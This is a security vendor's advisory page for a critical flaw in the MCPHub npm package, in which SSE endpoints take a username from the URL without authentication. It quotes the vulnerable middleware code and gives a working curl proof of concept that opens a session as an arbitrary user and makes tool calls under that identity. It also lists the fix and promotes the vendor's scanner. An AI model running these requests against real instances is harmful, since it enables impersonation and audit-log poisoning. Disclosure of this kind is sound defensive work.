How severe is GHSA-wf8q-wvv8-p8jf?

GHSA-wf8q-wvv8-p8jf has a CVSS score of 9.1/10, rated CRITICAL. Immediate patching is strongly recommended.

Which packages are affected by GHSA-wf8q-wvv8-p8jf?

GHSA-wf8q-wvv8-p8jf affects the following packages: @samanhappy/mcphub (npm). Ecosystems affected: npm.

How do I fix GHSA-wf8q-wvv8-p8jf?

Update @samanhappy/mcphub to 0.12.15 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-wf8q-wvv8-p8jf is resolved across your whole dependency graph.

How do I detect GHSA-wf8q-wvv8-p8jf in my npm dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @samanhappy/mcphub. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-wf8q-wvv8-p8jf if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-wf8q-wvv8-p8jf?

O3 pinpoints whether GHSA-wf8q-wvv8-p8jf is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-wf8q-wvv8-p8jf actively exploited in the wild?

No public exploit code has been indexed for GHSA-wf8q-wvv8-p8jf yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

When was GHSA-wf8q-wvv8-p8jf published, and has it been updated?

GHSA-wf8q-wvv8-p8jf was published on May 14, 2026 and was last updated on May 14, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

📦 npm

GHSA-wf8q-wvv8-p8jf

CRITICAL

@samanhappy/mcphub: SSE Endpoint Accepts Arbitrary Username from URL Path Without Authentication, Enabling User Impersonation

Published

May 14, 2026

Updated

May 14, 2026

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

Blast Radius

1 pkg affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

@samanhappy/mcphubnpm

333downloads / week

Description

Summary

A critical identity spoofing vulnerability in MCPHub allows any unauthenticated user to impersonate any other user — including administrators — on SSE (Server-Sent Events) and MCP transport endpoints. The server accepts a username from the URL path parameter and creates an internal user session without any database validation, token verification, or authentication check. The source code itself acknowledges this gap with a TODO comment.

Details

MCPHub provides user-scoped SSE endpoints at the path /:user/sse/:group. The sseUserContextMiddleware in src/middlewares/userContext.ts (lines 42–75) extracts the username from req.params.user and constructs a fabricated IUser object directly, bypassing all authentication:

export const sseUserContextMiddleware = async (
  req: Request, res: Response, next: NextFunction,
): Promise<void> => {
  const userContextService = UserContextService.getInstance();
  const username = req.params.user;  // ← Taken directly from URL, no validation whatsoever

  if (username) {
    // Note: In a real implementation, you should validate the user exists
    // and has proper permissions
    const user: IUser = {
      username,          // ← Completely attacker-controlled
      password: '',
      isAdmin: false,    // TODO: Should be retrieved from user database
    };

    userContextService.setCurrentUser(user);  // ← Fabricated identity is accepted as real
    attachCleanupHandlers();
    console.log(`User context set for SSE/MCP endpoint: ${username}`);
    next();
  }
  // ...
};

The SSE routes in src/server.ts (lines 132–161) apply only rate limiting and this context middleware — there is no authentication middleware in the chain:

// User-scoped routes with user context middleware
this.app.get(
  `${this.basePath}/:user/sse/:group(.*)?`,
  mcpConnectionRateLimiter,        // Only rate limiting
  sseUserContextMiddleware,         // Identity from URL — no auth
  (req, res) => handleSseConnection(req, res),
);

Additionally, UserContextService is a singleton that stores the current user in a single instance variable. Under concurrent connections, one user's context can silently overwrite another's, creating a secondary race condition vulnerability (CWE-362).

PoC

Prerequisites: A running MCPHub instance with enableBearerAuth: false (or bearer keys not configured).

Step 1 — Connect to the SSE endpoint as any arbitrary user:

curl -s -N --max-time 3 http://TARGET:3100/CEO-admin-impersonated/sse

Expected response — a valid SSE session is created:

event: endpoint
data: /CEO-admin-impersonated/messages?sessionId=54efc6f5-15ed-4e69-9a0e-de87d3179758

Step 2 — Verify on the server side (server logs):

[INFO] User context set for SSE/MCP endpoint: CEO-admin-impersonated
[INFO] Creating SSE transport with messages path: /CEO-admin-impersonated/messages
[INFO] New SSE connection established: 54efc6f5-15ed-4e69-9a0e-de87d3179758 with group: global for user: CEO-admin-impersonated

The server accepted a completely non-existent user, created a full MCP session, and is ready to proxy tool calls under this fabricated identity. No database lookup was performed, no token was validated.

Step 3 — Execute MCP tool calls under the spoofed identity:

Once the SSE session is established, the attacker can send MCP messages to the returned endpoint path, executing tools under the spoofed user's context:

curl -X POST http://TARGET:3100/CEO-admin-impersonated/messages?sessionId=54efc6f5-15ed-4e69-9a0e-de87d3179758 \
  -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"any-tool","arguments":{}}}'

Impact

This is a user identity spoofing vulnerability on the MCP transport layer. Any unauthenticated network user can:

Impersonate any user, including administrators, on SSE/MCP endpoints
Execute MCP tool calls under a spoofed user's identity, potentially accessing user-scoped resources and data
Poison audit logs — all actions are recorded under the fabricated username, destroying accountability and forensic value
Access user-scoped servers and groups that should only be available to authenticated users

All MCPHub instances exposing SSE endpoints without bearer authentication are affected. This includes the default configuration when bearer keys are not explicitly set up.

Reported by the Eresus Security Research Team.

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
📦npm	`@samanhappy/mcphub`	all versions	0.12.15

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @samanhappy/mcphub. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update @samanhappy/mcphub to 0.12.15 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-wf8q-wvv8-p8jf is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-wf8q-wvv8-p8jf is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-wf8q-wvv8-p8jf. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary A critical identity spoofing vulnerability in MCPHub allows any unauthenticated user to impersonate any other user — including administrators — on SSE (Server-Sent Events) and MCP transport endpoints. The server accepts a username from the URL path parameter and creates an internal user session without any database validation, token verification, or authentication check. The source code itself acknowledges this gap with a TODO comment. ### Details MCPHub provides user-scoped SSE endpoints at the path `/:user/sse/:group`. The `sseUserContextMiddleware` in `src/middlewares/userCon

O3 Security · Impact-Aware SCA

Is GHSA-wf8q-wvv8-p8jf in your dependencies?

O3 detects GHSA-wf8q-wvv8-p8jf across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works